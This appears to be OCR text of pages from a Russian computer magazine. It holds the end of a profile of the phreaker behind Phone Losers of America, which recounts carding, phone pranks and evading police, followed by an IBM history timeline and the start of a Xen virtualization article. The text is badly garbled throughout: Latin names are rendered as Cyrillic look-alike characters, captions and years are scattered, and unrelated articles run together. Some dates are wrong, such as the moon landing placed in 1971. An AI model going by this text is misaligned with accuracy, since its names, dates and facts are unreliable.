где устроился работать в контору, выполняющую продовольствен- 
ные заказы местной полиции. Для РВСР это была весьма нервная 
работа, так как каждый день ему приходилось контактировать с 
полицейскими, а ведь он жил под вымышленным именем и состоял 
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в розыске другого штата. Брэд был уже матерым фрикером, мог 
совершать бесплатные звонки по всей стране, создавать конфе- 
ренции, соединяя на одной линии до 15-ти человек, чем он часто и 
занимался вместе с еЦеІе. Они любили соединять на одной линии 
своих друзей, недругов и операторов платных служб типа «секс по 
телефону», устраивая веселые пранки. Больше всего РВСР при- 
калывался над своим бывшим другом Крисом Томкинсоным, кото- 
рый, видать, чем-то насолил Брэду в прошлом. Крис многие годы 
будет постоянной жертвой для пранков РВСР и еІ_іеТе, кроме того, 
его имя будет часто светиться в журнале РІ_А. 

РНопе І_озегз о! Атегіса 

На одной из телеконференций, проходящей в Орегоне, РВСР поз- 
накомился с девушкой-фрикершей по имени Колин Кард. Когда во 
время очередных скитаний по Штатам, он оказался неподалеку от 
Орегона (поселившись в отеле по украденному номеру кредитки), 
то решил заглянуть в гости к Колин. Они проводили вместе много 
времени, занимаясь совместным кардингом. Помимо книг, одежды 
и компакт-дисков, Брэду удалось снять по левым кредам отличный 
по тем временам лэптоп, с которым он будет часами просиживать 
в местном аэропорту, дожидаясь возвращения Колин из школы и 
дозваниваясь по чужим кредиткам до ВВЗ по всей стране. На одной 
из них он увидел пост своего друга еЦеІе, написавшего: «Я соби- 
раюсь создать по-настоящему крутую хак-группу, которую назову 
РНопе І_озегз о! Атегіса». Эл просто прикалывался, но РВСР заго- 
релся этой идеей. 

Прошло несколько месяцев, и Брэд оставил Колин. Это был ко- 
нец ноября 1994-го года. В Остине как раз начиналась НоНоСоп, 
куда направился фрикер. Там он встретился с еІ_іеТе, и они вместе 
вернулись домой, где Брэд не был уже полтора года. Собрав все 
свои статьи, некоторые из которых были написаны еще в школь- 
ные годы, и объединив их под заголовком РІ_А, РВСР выложил их на 
ВВЗ, где часто бывал. Они и составили первые 13 номеров Р1_А. 

Однажды человек, над которым Брэд осуществил серию пран- 
ков, едва его не вычислил, и РВСР пришлось вновь уехать. На этот 
раз в Корпус Кристи, штат Техас, где за полгода будут написаны 
номера РІ_А( с 1 6-го по34-й). ВТехасе его навещали Колин и еЦеІе, 
которые тоже приняли участие в создании езина. Благодаря уси- 
лиям троицы лейбл получил большую известность, при этом пос- 
тепенно приобретая черты настоящего журнала (до 30-го выпуска 
РІ_А с трудом можно было назвать журналом, так как он содержал 
одну-единственную статью в номере). Это было веселое время для 
фрикеров — ребята занимались трэшингом (поиск ценной доку- 
ментации в мусорных баках крупных фирм), дерзкими телефонны- 
ми выходками и другими вещами — все это освещалось в РІ_А. 

Но веселье продлилось недолго. При попытке купить билет на 
самолет для Колин по чужой креде, РВСР вновь был пойман по- 



лицией. Из его рюкзака копы изъяли рэдбокс, полицейский ска- 
нер, электронную записную книжку, набитую номерами кредиток, 
и скарженный ноутбук. Однако полицейские не очень-то дружили 
с подобной техникой и даже не потрудились изучить все это. Брэд 
скрыл от них свое настоящее имя, представившись К. Томкинсо- 
ным, и через сутки был выпущен на свободу, а все его вещи были 
возвращены. 

После этого Брэд решает уехать из Техаса и вместе с Колин от- 
правляется в город Элбани, где они расписываются, и у них появ- 
ляется первый ребенок. Брэд продолжает заниматься кардингом. 
Он добывает номера с помощью социальной инженерии, а потом 
«размножает» их с помощью проги СтазІегЗ, подбирающей на 
основе валидного номера сотни других. Он вскоре снова попада- 
ется полиции, но и тут ему везет: доказать первоначально предъяв- 
ленные обвинения в хищении денег с банковских счетов на сумму 
около 10-ти тысяч полиции не удалось, так что Брэд отделывается 
штрафом в $250. В этот период РІ_А возрождается в Интернете под 
доменом, зарегистрированным РВСР. А еЦеІе и АрокОІурз (этот 
парень станет четвертым членом редакции РІ_А, начиная с 36-го вы- 
пуска) тем временем создают собственную компьютерную фирму, 
предоставляющую провайдерские услуги. Само собой, она берет 
на себя хостинг сайта РІ_А (в течение следующих лет сайт сменит 
порядка 4-х доменов, пока не обретет существующий и поныне 
ѵѵѵѵѵѵ.ріпопеіозегз.ога ). 

Проживая в Элбани, РВСР с друзьями зарелизил номера зай- 
на с 37-го по 41-й. В октябре 1996-го Брэд и Колин переезжают 
в Огайо. Там они выпустят в свет еще несколько номеров жур- 
нала, вплоть до последнего 46-го, в котором Брэд напишет о за- 
крытии е-гіпе и планах команды по развитию сайта РНопе І_озегз 
оі Атегіса. Это оказались не пустые слова, так как сегодня сайт 
РІ_А, пожалуй, наиболее авторитетный веб-ресурс, посвященный 
тематике фрикинга и пранка. Он сумел объединить сотни и тысячи 
фрикеров США. Помимо основного сайта, существует более 60-ти 
региональных, призванных создать среду для общения и обмена 
опытом живущих в различных уголках страны фрикеров. Один из 
поклонников РІ_А высказался о нем так: «РІ_А — такой незатейли- 
вый и не претендующий на серьезность в плане содержания, стал 
настоящим вирусом в умах американских хакеров 90-х». Похоже, 
так оно и есть. 

Р.8. 

В 1 999 году у Брэда родился сын, а в 2002-м они с Колин расстались. 
Сейчас фрикер живет в Элбани, занимаясь администрированием 
сайта рИопеІозегз.ога и несколькими другими проектами. еЦеІѳ и 
АрокОІурз проживают в настоящий момент в Колорадо и руководят 
собственной компьютерной компанией. Преследование РВСР по- 
лицией штата Иллинойс было прекращено в 1998-м, а кардингом 
Брэд не промышляетуже долгие годы. Отец КрисаТомкинсонастал 
известным человеком, рассказав газетам о том, как на протяжении 
нескольких лет неизвестные хулиганы проделали сотни телефон- 
ных розыгрышей над его сыном и всей семьей Томкинсоных. зс 
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Сцена / 03 

Вѳковст история ІВМ 

Вершители компьютерной революции 




міыэѵѵовк 

/ МШОѴѴОКК@САМЕІ.АЫО.КІІ / 

Эти три буквы известны каждому, даже далекому от компьютеров 
человеку. У кого-то они вызывают ассоциации с персональным 
компьютером, у кого-то — с громадными мощными мейнфрей- 
мами, для кого-то — это лишь название производителя на крышке 
ноутбука. ІВМ — это старейшая, крупнейшая и самая влиятель- 
ная в мире ІТ-компания, на которую работает более 330 тысяч 
человек и годовой оборот которой составляет 9 1 миллиард дол- 
ларов. Сложно представить, каким был бы сейчас мир, если бы 
более сотни лет назад не появилась скромная фирма СотриПп^ 
ТаЬи1аПп§ Кесогсііп^; и ее предводитель Тотаз ѴУцзоп. . . 
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СЦЕНА 




Тотаз 

\УаИ5оп 



Томас не учился в престижном 
университете и не брал уроки у 
бизнесменов. Он лишь закончил 
один курс в школе коммерции 
Эмира и затем, в возрасте 1 8-ти 
лет, устроился бухгалтером на 
рынок Кларенса Риели в Нью- 
Йорке. Парень мечтал открыть 
свое дело и всеми силами 
пытался скопить достаточное 
количество денег. 



МАТЮЫАЬ САЗН ВЕОІЗТЕВ 



Приторговывал швейными 
машинками и музыкальными 
инструментами, а после пос- 
тупления на работу в компанию 
ІМаІіопаІ СазИ ЯедізІег(І\ІСВ) 
работал не покладая рук и 
дослужился до позиции главного 
менеджера по продажам. Имен- 
но здесь Уотсон придумал девиз 
«Думай», который впоследствии 
станет символом ІВМ. 



90-ТН (РНІЗОКІ) 



В начале 90-х годов Уотсона 
вместе с владельцем І\ІСВ 
арестовали. Оказалось, что 
он уже долгое время вел 
не совсем честную борьбу 
с конкурентами, продавая 
липовые и секондхендовые 
регистрации. В суде ему дали 
год тюрьмы. 




| РАННИЕ ГО Д Ы ІВМ ;>ѵѴ А Ст 7 ' /. 






ІЗСНООІ. 8УЗТЕМ 


30 


1932 


1933 



Клиентами ІВМ были самые 
разные компании и организации. 
Заказы часто были довольно 
экзотичными, и инженерам 
приходилось все время искать 
новые пути их выполнения. В 
результате этого появлялись 
уникальные изобретения, такие 
как первая в истории электрон- 
ная система распределения 
школьного времени, управляю- 
щая звонками и расписанием, 
или новый вид перфокарт с 
увеличенной скоростью доступа. 



ЗОЛОТОЕ ВРЕМЯ 

50 



Во время Великой депрессии 
30-х годов подавляющее 
большинство технических 
компаний США обанкроти- 
лось. В то время как ІВМ не 
только осталась на плаву, но и 
обеспечила для своих сотруд- 
ников отличные условия рабо- 
ты и достойную заработанную 
плату. Корпорация одной из 
первых предоставила для 
своих работников страховую 
систему и оплачиваемые 
отпуска. 



1952 



А в 1932-м году было основано 
исследовательское подразделе- 
ние, занимающееся разработ- 
кой всех передовых технологий 
ІВМ. Нью-йоркская лаборатория, 
в которой работали его со- 
трудники, была одной из самых 
технически оснащенных в мире. 



1955-1960 



Г одом позже появился подготови- 
тельный институт, где обучались 
работники компании. Г одовой 
доход ІВМ в это время достиг 20-ти 
миллионов долларов, а количест- 
во работающих людей превышало 
отметку в десять тысяч. 



Со дня своего основа- 
ния ІВМ занималась 
производством часов 
и только в 1 9 5 8 -м году 
продала свое «времен- 
ное» подразделение* . 



На протяжении 50-х годов 
деятельность корпорации плавно 
переходила к производству 
больших компьютеров. ІВМ 
стала главным поставщиком 
компьютерного оборудования 
для систем защиты Воздушных 
сил США. Разрабатывая для 
правительства антивоздушную 
систему перехвата ЗАО Е стои- 
мостью 30 миллионов долларов, 
компания получила доступ ко всем 
передовым разработкам ученых 
из Массачусетского технологи- 
ческого института. Совместными 
усилиями инженеры разработали 
интегрированный видеоэкран, 
память на магнитных сердечниках, 
световой пистолет, первый алгеб- 
раический компьютерный язык, 
способ передачи информации по 
телефону, мультипроцессорные 
технологии, компьютерную сеть и 
другие революционные вещи. 



В 1952-м году ІВМ предста- 
вила новый компьютер 701 , 
основанный на вакуумных 
трубах и впервые использу- 
ющийся для хранения инфор- 
мации на магнитной пленке. 
Эта модель была намного 
быстрее Магк I и удобнее в 
эксплуатации, использова- 
лась преимущественно для 
научных расчетов. В том 
же году пост президента 
корпорации занял сын То- 
масаУотсона — Том Уотсон 
младший. Вскоре он напишет 
известный документ, выгра- 
вированный рядом с главным 
офисом: «Работником ІВМ 
может стать любой человек 
независимо от расы, цвета 
кожи и вероисповедания, 
если он достаточно талан- 
тлив и образован, чтобы 
выполнять поставленные 
задачи». 



ІВМ продолжает совершенство- 
вать свои компьютеры. В ком- 
мерческой продаже появляется 
ІВМ 704 со встроенными возмож- 
ностями операций, с плавающей 
точкой и индексацией, исполь- 
зующий новый вид магнитной 
памяти. С 1 955-го по 1 960-й год 
корпорация произвела более 
1 20-ти таких м аш и н . Т акже п о 
заказу военных ІВМ сконструи- 
ровала ІМаѵаІ Огбпапсе ВезеагсИ 
Сотриіег (ІЧОВС) — самый 
мощный электронный компью- 
тер своего времени. 



В 1 957-м году инженеры ІВМ 
разработали язык програм- 
мирования Рогігап (РОВтиІа 
ТВАІМзІаІіоп), который сразу же 
стал самым популярным инстру- 
ментом для научных работ. 
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Іпіегпаііопаі Визіпезз МасЬіпез 
-1924-1946- 




ІВМ іпігапзіііоп 
-1947-1956- 



ІВМ 

т 

ІВМ сопііпиііу 
-1956-1972- 




ІВМ іпіегпаііопаі гесодпШоп 
-1972- 



СОМРІІТІШТАВІІІ.АТІМСІ РЕСОНОІШ 



Когда Том вышел на свободу, 
одной из самых быстроразвива- 
ющихся американских компаний 
был а Сотриііпд ТаЬиІаІіпд 
Весогбіпд (СТР) Согрогаііоп. 
Основана она была в июне 1911 
года, впоследствии соединив в 
себе три компании: ТаЬиІаііпд 
МасИіпе, Сотриііпд Зсаіе и Тіте 
Ресогбіпд. СТР специализирова- 
лась на производстве оборудо- 
вания для выбивания и считы- 
вания перфокарт (владельцем 
ТаЬиІаІіпд МасИіпе был изобре- 
татель перфокарт), а помимо 
этого занималась поставками 
офисного оборудования, часов и 
пищевых продуктов. 



СОМРЦТІШТАВІІІ.АТІМѲ РЕСОРОІЫО ++ 1 МАУ 1914 



30-40 



В концу 30-х годов основной 
продукцией ІВМ были различные 
электронные и механические 
машины, но с началом Второй 
мировой войны фокус сместил- 
ся. Этот факт не упоминается 
в официальной истории ком- 
пании, но в 30 — 40-х годах ІВМ 
снабжала нацистов машинами 
для обработки перфокарт и 
разрабатывала для них новые 
технологии. Даже Г итлер на- 
градил ТомаУотсона медалью, 
которую тот позже вернул. 



Опираясь на свой опыт в І\ІСВ, 
Уотсон внес в работу компа- 
нии несколько эффективных 
бизнес-моделей: щедрые поощ- 
рения успешным сотрудникам, 
упор на сервисное обслужи- 
вание клиентов, воспитание 
гордости и верности корпорации 
в душе каждого работника. Т ак- 
же Том сделал все возможное, 
чтобы укрепить дружбу в коллек- 
тиве: организовал спортивные 
команды, сделал постоянными 
семейные встречи и корпора- 
тивные вечеринки. А его слоган 
«Думай» стал своеобразной 
библией для сотрудников СТР. 



ТНЕѴѴАК 



Когда США объявили Г ермании 
войну, все заводы корпорации 
перешли в распоряжение 
американского правительства. 
Именно в военные годы ІВМ 
сделала первый шаг 
к созданию компьютеров. 




Через 1 1 месяцев, 1-го мая 
1 91 4-го года, ТомаУотсона избра- 
ли новым президентом компании, 
и под его руководством Сотриііпд 
ТаЬиІаІіпд Ресогбіпд стала быстро 
развиваться. СТР оставила малый 
офисный рынок, сфокусировав- 
шись на более серьезных зака- 
зах. За небольшое время Уотсону 
удалось вдвое увеличить прибыль 
и расширить сферы влияния по 
всему миру. 




ѵтм 



Большим достижением стал 
выпуск множителя на вакуумных 
трубках (ѴТМ) — первой пол- 
ностью электронной машины, 
выполняющей арифметические 
действия. Благодаря использо- 
ванию вакуумных труб, которые 
до этого применялись в основ- 
ном в радиоиндустрии, удалось 
увеличить скорость обработки 
информации в тысячи раз по 
сравнению с предыдущими 
аналогами. 



В 1 924-м году, когда область де- 
ятельности корпорации вышла 
далеко за рамки перфокарт и 
стала по-настоящему междуна- 
родной, Том переименовал ее в 
Іпіегпаііопаі Визіпезз МасИіпез, 
или просто ІВМ. 




ѴѴаІзоп 
на одном из 
первых заводов 
ІВМ 



1964 



1964 



1944 



В 1 944-м году, спустя 6 лет 
исследований и разработок, в 
Г арвардском университете был 
создан пятитонный Магк I — 
первая в истории машина, 
способная автоматически про- 
водить сложные вычисления. 

А в конце 40-х появилась серия 
мини-калькуляторов, которые 
использовались в работе 
перфокарт и предназначались 
для использования в компью- 
терных центрах. 



1969 



В 60-х годах в мире насчиты- 
валось 8 основных производи- 
телей компьютеров: Зсіепііііс 
Эаіа Зузіетз, Сопігоі Эаіа 
Согрогаііоп, ІЛЧІѴАС, ОепегаІ 
Еіесігіс, ВиггоидНз, ВСАапсІ 
НопеуѵѵеІІ, среди которых ІВМ 
была самой крупной и влия- 
тельной из всех. Успех корпо- 
рации был настолько велик, что 
правительство США запустило 
судебное разбирательство 
о попытке монополизации 
передовых технологических 
разработок. Дело это длилось 
много лет и закончилось только 
в 1983-м году, в целом сильно 
повлияв на модель работы, 
компании. 



Самым важным проектом ІВМ в 
60-х и вообще одним из самых 
революционных в ее истории 
стал представленный в 1964-м 
году ІВМ Зузіет /360. В этой 
модели лежала концепция 
совместимости, то есть стало 
возможным постепенно наращи- 
вать мощность машины, заменяя 
устаревшие комплектующие 
новыми. 




В это время многие компании 
нуждались в компьютерных 
решениях, но часто приходилось 
выбирать между устаревшей и 
мощной, а значит, неприемле- 
мо дорогой машиной. В итоге 
потенциальные клиенты просто 
отказывались приобретать ком- 
пьютер. Разработка технологии 
совместимости обошлась ІВМ 
в 5 миллиардов долларов (30 
миллиардов по современным 
меркам), что сделало иссле- 
довательский проект одним 
из самых дорогих в истории 
бизнеса. Корпорация поставила 
на Зузіет /360 практически все. 
И не прогадала — впоследствии 
все окупилось сполна. 



В 1969-м году Томас Уотсон млад- 
ший внес еще одно революцион- 
ное изменение — теперь уже в 
систему продаж оборудования. 
Если раньше все компьютеры 
и ПО поставлялись целиком в 
коробке, то теперь появилась 
возможность купить компоненты 
по отдельности. Это решение 
образовало новый рынок с 
огромным денежным оборотом, и 
ІВМ заняла в нем ведущую роль. 



В 2004-м году ІВМ получила 
рекордное количество патентов 
на новые изобретения — 3248 . 
Сейчас количество патентов, 
которыми владеет компания, 
достигает 32-х тысяч. 
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СЦЕНА 



ІВМРС 

Появление ІВМ РС (модель 5150) стало результатом попытки ком- 
пании завоевать рынок домашних компьютеров. В это время ли- 
дерами его были Арріе II и СР/М. ІВМ поручила команде из 12-ти 
своих лучших инженеров под предводительством Уильяма Лоу 
сконструировать модель, способную успешно конкурировать с 
этими платформами. Разработка ІВМ 5150 длилась ровно год. Уче- 
ные решили впервые в истории компании использовать в произ- 



водстве комплектующие других производителей. Процессор был 
заказан у молодой фирмы Іпіеі, а операционная система Э05 — у 
тогда еще малоизвестной МісгозоЙ. Также авторы разумно пред- 
положили, что при открытой архитектуре, когда ІВМ РС смогут со- 
здавать и поставлять на рынок другие компании, машина станет 
популярнее. А чтобы контролировать рынок и всегда быть впереди 
конкурентов, решили лицензировать РОМ ВІ08. 





70 


1971 


1973 


1979 


Помимо разработки компью- 
теров, ІВМ начинает покорять 
новые рынки. 

В 1970-м году корпорация 
представила ІВМ Соріег — 
машину для фотокопирова- 
ния. Г одом позже появилась 
система распознавания речи, 
«понимающая» 5000 слов. 
Также ІВМ предоставляет 


Когда в 1 971 -м году космичес- 
кий аппарат АроІІо совершил 
посадку на Луну, все компью- 
терные операции происходили 
на компьютерах ІВМ. Чуть 
позже научное подразделение 
компании, поддерживающее 
космические программы, полу- 
чит почетную награду ІЧАЗА за 
выдающийся вклад в исследо- 


В 1 973-м году инженеры 
корпорации разрабатывают 
прототип дискового блока 
ІВМ 3340, более известного 
как «винчестер». Технология, 
используемая в нем, позволила 
вдвое увеличить плотность 
записи данных на дисках, и на 
протяжении следующих 20-ти 
лет она станет стандартной для 


В это время компанию возгла- 
вил Франк Кэрри, который уже 
долгое время занимал высокую 
должность. Том Уотсон млад- 
ший по-прежнему оставался 
в составе директоров, но в 
1 979-м году переехал в Совет- 
ский Союз и представлял там 
ІВМ. 



новые виды сервисов, такие 
как кодирование и теснение 
кредитных карт в условиях 
полной безопасности. 



вани космоса. 



всех жестких дисков. 




БОЛЬШИЕ ИНВЕСТИЦИИ | 






1982 


1985 


1986 


1987 



На протяжении 80-х годов ІВМ 
продолжила покорять рынок, 
разрабатывая новые модели 
компьютеров и расширяя воз- 
можности отдельных комплек- 
тующих. Новым полем, которое 
освоила ІВМ, стало создание про- 
мышленных роботов. В 1982-м 
году выходят две программируе- 
мые роботосистемы: 7565 и 7535. 



еЗегѵег 
мощный 
сервер от ІВМ 




1994 



После того как Джон Экерс в 
1 985-м году возглавил корпора- 
цию, ІВМ стала одним из самых 
крупных в мире инвесторов 
в разработке новых техно- 
логий. Для поощрения новых 
идей и проектов был открыт 
внутренний 100-миллионный 
фонд (полученные в его рамках 
креативные решения сэконо- 
мили компании в 8 раз больше). 
Кроме того, выделенные на 
исследования средства поз- 
волили реализовать большое 
количество революционных 
проектов в области физики, 
математики, расширить ком- 
пьютерные возможности. 



1994 



За несколько лет исследователи 
и инженеры ІВМ получили ряд 
престижных научных премий, 
включая 4 Нобелевские, а в 
1 986-м году Нобелевскую пре- 
мию получают Г ерд Биннинг и 
Хейнрик Рохрер за изобретение 
нового способа микроскопичес- 
кой съемки поверхности, при 
которой видны отдельные атомы. 



Г одом позже ту же награду 
вручили Джорджу Беднорзу и 
Алексу Мюллеру за открытие 
сверхпроводимости нового 
класса материалов при высо- 
кой температуре. 

Основной научный состав 
сотрудников ІВМ работает в 
КезеагсЬ Тгіагщіе Рагк - одном 
из крупнейших исследователь- 
ских центров мира. Располо- 
жен он в Северной Каролине и 
вмещает на своей территории 
более 100 зданий, в которых 
трудятся около 40 тысяч 
человек. По количеству прово- 
димых исследований КТР 
можно сравнить с Кремниевой 
Долиной. 



ІІВМ СЕГОДНЯ ■ 




1997 


2 



С развитием компьютерных 
сетей ІВМ стала уделять большое 
внимание разработке сетевых 
приложений и устройств. 

В 1 994-м году компания форми- 
рует ІВМ (ЗІоЬаІ ІМеіѵѵогк — новое 
подразделение, занимающе- 
еся созданием крупнейшей в 
мире высокоскоростной сети 
для связи правительственных 
и коммерческих структур. Ее 
клиентами станут более 2-х 
миллионов человек. 



ІВМ 5100 
первый 
в мире 
портативный 
компьютер 



В 1 994-м году состоялась пре- 
зентация РоѵѵегРС 604 — 
самого мощного в мире мик- 
ропроцессора, способного 
обрабатывать 40 мегабайт 
информации в секунду. 



Имя ТЫпкРаб серия ноутбу- 
ков получила благодаря науч- 
ному сотруднику компании, 
который однажды вышел на 
обеденный перерыв, захватив 
с собой блокнот (раб) с надпи- 
сью «Думай» (гЬіпк) на облож- 
ке. Он работал над проектом 
по созданию небольшого 
портативного девайса, кото- 
рый и получил впоследствии 
название ТЫпкРаб. 



В 1 997-м году ІВМ продемонстри- 
ровала возможности совре- 
менных компьютеров, построив 
Эеер ВІие — машину, запрограм- 
мированную на игру в шахматы. 
На встрече с чемпионом мира 
Г арри Каспаровым Эеер ВІие 
одержал верх, что вызвало 
волну споров о перспективах 
компьютеров и приближенности 
их способностей к человеческо- 
му разуму. 

К концу десятилетия ІВМ 
становится ведущим поставщи- 
ком компьютерных серверов. 
Серверы от ІВМ используют 
95% крупнейших бизнес-компа- 
ний мира, а самой популярной 
серверной машиной стал ІВМ 
А8/400 (продано 700 тысяч штук 
в 1 50-ти странах мира). 



В 2000-м году появилась новая 
серия ІВМ еВегѵег — сервер 
нового поколения, унаследо- 
вавший мощь и надежность 
мейнфреймов. В этом же году 
ІВМ делает крупнейшую в 
своей истории инвестицию 
в размере 5-ти миллиардов 
долларов — рядом с Нью-Йор- 
ком стартует строительство 
самого технологически-ос- 
нащенного в мире завода по 
производству чипов. 



Ш * *• 
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ІВМ 5150 был представлен 11-го августа 1981-го года, и этот 
компьютер воплощал в себе все требования и мечты техноги- 
ков. Портативный, легкий в освоении, расширяемый, сравни- 
тельно недорогой (цена базовой конфигурации составляла 
$1565), он был просто обречен науспех. Компания Сотрац 
Сотриіег Согрогаііоп вскоре после появления РС на рынке 
среверс-инженерила программный код ВІ05 и запустила в 



производство первый клон 5150 — Сотрац РогІаЫе. Также 
ІВМ РС, не обладающий мультимедийными возможностями, 
на протяжении 80-х годов так и не смог побороть 8-битные 
персональные компьютеры. Зато благодаря офисным про- 
граммам типа ѴізіСаІс он стал офисным компьютером номер 
один в мире. Популярный американский журнал даже назвал 
ІВМ РС «человеком года». 



1981 



1975 



70-е годы стали началом микропроцессорной революции. Конечно, 
ІВМ не остается в стороне и начинает активно использовать новые 
технологии в своих продуктах. В 1 975-м году выходит в свободную 
продажу ІВМ 5100 РогІаЫе Сотриіег — один из самых первых 
портативных компьютеров, где все комплектующие находятся в 
одном корпусе. Кассетный привод, 5-дюймовый экран, собствен- 
ный процессор от ІВМ, несколько сотен килобайт геаб-опіу памяти, 
содержащей системный софт и 64 Кб памяти, доступной для записи, 
— такими были его характеристики. Весил он 25 килограммов и сто- 
ил, в зависимости от комплектации, от 9-ти до 20 -ти тысяч долларов. 
Несмотря на то, что это было новое слово в производстве компьюте- 
ров, большого распространения ІВМ 51 00 не получил — в основном 
из-за высокой цены и отсутствия удобного интерфейса. 



Наконец, в 1 981 -м году получа- 
ет рождение ІВМ РС, и с этого 
начинается новая эра компью- 
теростроения. 





Такими были 
первые ІВМ РС 



ІВМ АЗ/400 
с логотипом 
ІВМ -1990- 




1 984 ОІ-ѴМРІС 



Параллельно компания прини- 
мает активное участие в финан- 
сировании государственного об- 
разования, вложив 80 миллионов 
долларов в различные гранты 
и культурные программы. А в 
1984-м году становится главным 
спонсором Олимпийских игр. 

Тем временем инженеры 
представляют новые модели 
компьютеров. 



1987 



В 1 987-м году выходит более 
мощная модель ІВМ РС — Р8/2. 
За 6 месяцев удается продать 
миллион штук, в то время как 
оригинальному РС для этого 
понадобилось 28 месяцев. 

В поддержку своего нового 
детища компания разработала 
операционную систему 08/2, 
которая дала пользователям 
мультизадачность, защищен- 
ность и возможность работы с 
очень большими приложениями. 



ВШЕСЕЫЕ 



1993 



1 9-го января 1 993-го года 
ІВМ анонсировала убытки за 
прошедший год в размере 
5-ти миллиардов долларов. 
Таких потерь в истории США не 
несла еще ни одна компания. 

В результате этого была пол- 
ностью пересмотрена система 
ведения бизнеса, и корпорация 
сменила приоритеты, перейдя 
от разработки компьютеров 
и комплектующих к созданию 
программного обеспечения и 
предоставлению различных 
сервисов и консультаций. 



1993 



В этом же году ІВМ представи- 
ла очень удачную модель но- 
вого ноутбука ТИіпкРаб, в ко- 
тором впервые использовался 
трекпоинт, интегрированный 
в середину клавиатуры. Этот 
портативный компьютер сразу 
стал хитом, завоевав более 
трехсот наград за уникальный 
дизайн и качество. 



здание ІВМ 
в Нью-Йорке 




2005 



Разрабатывая сетевую продук- 
цию и софт, ІВМ не отошла от 
рынка, в котором всегда зани- 
мала ведущую роль — рынка 
суперкомпьютеров. Г ордостью 
компании является ВІие (Зепе/І_, 
мощностью 280,6 Терафлоп и 
состоящий из 65536 узлов. Эта 
махина занимает первое место 
в списке самых производи- 
тельных суперкомпьютеров в 
мире. Корпорация продолжает 
наращивать мощность, и в 
последней модели ВІие Оепе/О 
отметка производительности 
будет достигать 3-х Петафлоп. 



В феврале 2005-го года ІВМ 
раскрыла подробности своего 
совместного с Зопу проекта 
по созданию «клеточного» 
микропроцессора, работа- 
ющего на основе векторной 
обработки данных. Первым его 
применением стала приставка 
РІауЗіаІіопЗ. 



В стенах ІВМ было 
изобретено огромное 
количество техноло- 
гий, широко применя- 
емых сегодня. Среди 
них: жесткий диск, 
флоппи-диск, курсор, 
динамическая память, 
видеозаписывающая 
головка, архитектура 
ВІ8С, ТГ8В йазй сігіѵе и 
многие другие. 



На протяжении XX 
века рабочей формой 
сотрудников ІВМ 
были синий пиджак, 
белая рубашка и 
темный галстук. 
Только к 1990-му году 
компания смягчила 
требования, и теперь 
форма одежды здесь 
не отличается от 
принятой в других 
крупных фирмах. 




ХАКЕР 05 /89/ 06 



093 












ЕВГЕНИЙ ЗОБНИН АКА Л М 

/ Л М@І_ІЗТ.РШ / 



Ьпіхоісі / 01 

Искусство 

виртуализации 



Используем эмуляторы в быту 



Представь себе такую ситуацию: ты сидишь 
во РгееВЗО и грепаешь логи своего личного 
домашнего Іір-сервера в надежде, что зло- 
бные хакеры не пролезли в машину через 
незалатанную дыру в РгоРТРб. Закончив 
с этой процедурой и не заметив ничего 
подозрительного, ты, используя простую 
комбинацию клавиш, переключаешься в 
ЗІаскѵѵаге І_іпих, включаешь музыку и при- 
ступаешь к разбору пришедшей за ночь 
почты. За этим занятием ты вспоминаешь, 
что хотел обновить свой второй дистрибу- 
тив І_іпих, переключаешься в (Зепіоо, наби- 
раешь «етегде--зупс» и возвращаешься 
обратно в ЗІаскѵѵаге. Сказка? Отнюдь! Ис- 
пользуя монитор виртуальных машин Хеп, 
ты сможешь варьировать операционными 
системами не хуже, чем цирковой артист 
жонглируеттеннисными мячами. 




Хеп: общие сведения 

Хеп был разработан исследовательской 
группой Кембриджского университетав рам- 
ках проекта Хепозегѵег, предназначенного 
для организации распределенных вычисле- 
ний. Первая публичная версия — 1.0 (была 
выпущена в октябре 2003-го года), текущая 
разрабатываемая версия — 3.0. Коммерчес- 
кой поддержкой Хеп занимается компания 
ХепЗоигсе ( ѵѵѵѵѵѵ.хепзоигсе.сот ). а в число 
участников проекта входят такие гиганты, 
как ІпіеІ, АІѴЮ, ІВМ, НР, ІМоѵеІІ и РесІНаІ:. 

Мы рассмотрим особенности установки и 
использованияХеп, но сперва, потрадиции, 
немного теории. 

Властелин колец 

В мире высоких технологий нередко можно 
наблюдать ситуацию, когда от возникно- 
вения идеи до начала ее массового при- 
менения проходит внушительный отрезок 
времени. Не стала исключением и идея 
монитора виртуальных машин, предложен- 
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/1/ зіагіир 

загрузка Ііпих 
в окне хіегт выглядит 
немного странно 



/2/ Іез! 

сравнение производительности 
Ііпих, хеп, ѵтѵѵаге и иті 



ная и реализованная более 30-ти лет назад 
компанией ІВМ в виде программного пакета 
ѴМ/370. Создатели Хеп повторили «подвиг» 
программистов из ІВМ. Вместо того чтобы 
реализовывать виртуальную машину по- 
верх существующей ОС (яркие примеры: 
ѴМѴѴаге, дети; подробнее о дети читай 
ниже), они положили код виртуализации в 
основу самой ОС. Хеп работает на «голом» 
железе, а все операционные системы за- 
пускаются поверх виртуальной машины, 
созданной им. Такая архитектура позво- 
лила достичь поистине уникальных харак- 
теристик быстродействия (по некоторым 
оценкам І_іпих, работающий поверх Хеп, по 
скорости отстает от нэйтивного І_іпих всего 
на 3 процента!). Но как же удалось реали- 
зовать такое? 

Думаю, ты в курсе, что процессоры архи- 
тектуры х86 (ІА-32), работая в защищенном 
режиме, используют четыре уровня защиты 
памяти (так называемые кольца: гіпдз 0 — 3). 



Современные операционные системы ис- 
пользуют только два из них: гіпд 0 — самый 
привилегированный уровень, в нем запус- 
кается ОС, и гіпд 3 — наименее привиле- 
гированный, используемый для запуска 
программ уровня пользователя. Таким об- 
разом, код программ с уровня 3 не имеет 
прав доступа к адресному пространству 
уровня 0 и не может помешать работе ОС. 
Разработчики Хеп пошли дальше, решив 
использовать уровни 1 и 2 для своих нужд. 
Непосредственно Хеп, называемый ги- 
первизором (Иурегѵізог), запускается на 
уровне 0, операционные системы теперь 
работают на уровне 1 , а пользовательские 
программы, как и положено, на уровне 3. 
Кроме того, для работы Хеп нужен так на- 
зываемый супервизор (зирегѵізог) и опера- 
ционная система, драйвера которой будут 
использовать гостевые ОС для доступа к 
железу. В этой же ОС будут работать поль- 
зовательские утилиты, предназначенные 



для управления гостевыми ОС. Для запус- 
ка каждой гостевой ОС Хеп создает новую 
виртуальную машину, играющую роль изо- 
лированного (и фиктивного) окружения ОС 
в виде виртуального ПК. По принципу ра- 
боты Хеп можно сравнить с многозадачной 
ОС. Только в отличие от ОС, которая созда- 
ет для каждого процесса изолированное 
адресное пространство и окружение, Хеп 
делает то же самое не для процессов, а 
для других операционных систем. Одним 
словом, с помощью Хеп можно легко пре- 
вратить один физический ПК во множество 
виртуальных. 

В чем подвох? 

